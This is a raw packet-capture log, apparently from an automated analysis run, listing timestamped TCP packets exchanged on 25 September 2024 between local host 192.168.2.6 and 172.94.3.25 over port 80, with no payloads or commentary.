Sep 25, 2024 16:03:59.200217009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200252056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200270891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200280905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200293064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200304985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200314045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200345039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200493097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200520992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200551987 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200584888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200597048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200607061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200618982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200630903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200650930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.210210085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.210227966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.210340023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.260688066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.260725021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.260848045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278203011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278266907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278281927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278295040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278315067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278326988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278340101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278361082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278369904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278372049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278388977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278389931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278402090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278405905 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278414965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278428078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278440952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278444052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278461933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278546095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278559923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278570890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278579950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278583050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278683901 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278831959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278853893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278865099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278865099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278893948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.278904915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278917074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.278959036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.279078960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.279090881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.279100895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.279122114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.327470064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.369842052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369869947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369882107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369904041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369924068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369942904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369957924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369970083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.369981050 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370031118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370095968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370107889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370122910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370153904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370243073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370274067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370408058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370570898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370589972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370603085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370604992 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370615005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370632887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370737076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370748043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370758057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370769978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370769978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370780945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370790958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370790958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370820999 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.370975971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.370986938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.371011019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.371138096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.371149063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.371160030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.371169090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.371186972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.448791027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448832035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448863983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448883057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448899984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448916912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448934078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448950052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448965073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.448978901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.448998928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449016094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449026108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449035883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449043989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449060917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449079037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449084044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449096918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449110985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449115038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449137926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449146032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449160099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449176073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449193001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449196100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449213028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449228048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449232101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449249029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449261904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449269056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449299097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.449323893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449342012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.449373960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.526340008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526568890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526583910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526632071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.526707888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526720047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526731014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526743889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526746988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.526767969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.526849985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526861906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.526882887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527018070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527029037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527040005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527050972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527053118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527064085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527071953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527081966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527103901 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527160883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527173042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527184010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527193069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527211905 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527322054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527333975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527344942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527379990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527472019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527504921 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.527647972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527659893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.527693033 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604069948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604093075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604104996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604110956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604120016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604135036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604147911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604182959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604195118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604207993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604212999 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604219913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604232073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604271889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604460001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604473114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604484081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604521990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604542971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604554892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604567051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604574919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604603052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604641914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604660034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604671001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604696035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604908943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604928970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604942083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.604942083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.604973078 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.614468098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.614521980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.614608049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.675592899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682051897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682081938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682094097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682105064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682117939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682128906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682142019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682151079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682189941 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682265043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682285070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682296038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682296038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682324886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682331085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682342052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682353020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682383060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682606936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682626963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682637930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682641983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682673931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682732105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682744026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682754993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682799101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682895899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682938099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.682950974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682961941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.682992935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.683005095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.683013916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.683028936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.692398071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.692420959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.692466021 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.710113049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.717122078 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760106087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760130882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760143995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760154963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760168076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760178089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760191917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760204077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760222912 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760248899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760266066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760276079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760338068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760551929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760612011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760622025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760643959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760647058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760654926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760665894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760680914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760696888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760835886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760847092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760858059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760881901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760891914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760893106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760929108 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760941029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760955095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.760973930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.760991096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.761022091 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.761030912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.761075020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.761105061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.761131048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.811778069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.660207033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660238981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660353899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660365105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.660406113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660415888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660434008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660451889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.660466909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660473108 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.660574913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660581112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660588026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660604000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660610914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.660614967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660625935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.660646915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.660788059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660801888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660811901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.660846949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.661593914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661631107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661639929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.661649942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661660910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661673069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661689043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661693096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.661700964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661710978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661721945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661722898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.661741972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.661746979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.661761045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.702464104 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:04:01.738332987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738346100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738363981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738375902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738389969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:04:01.738404036 CEST	80	49715	172.94.3.25	192.168.2.6
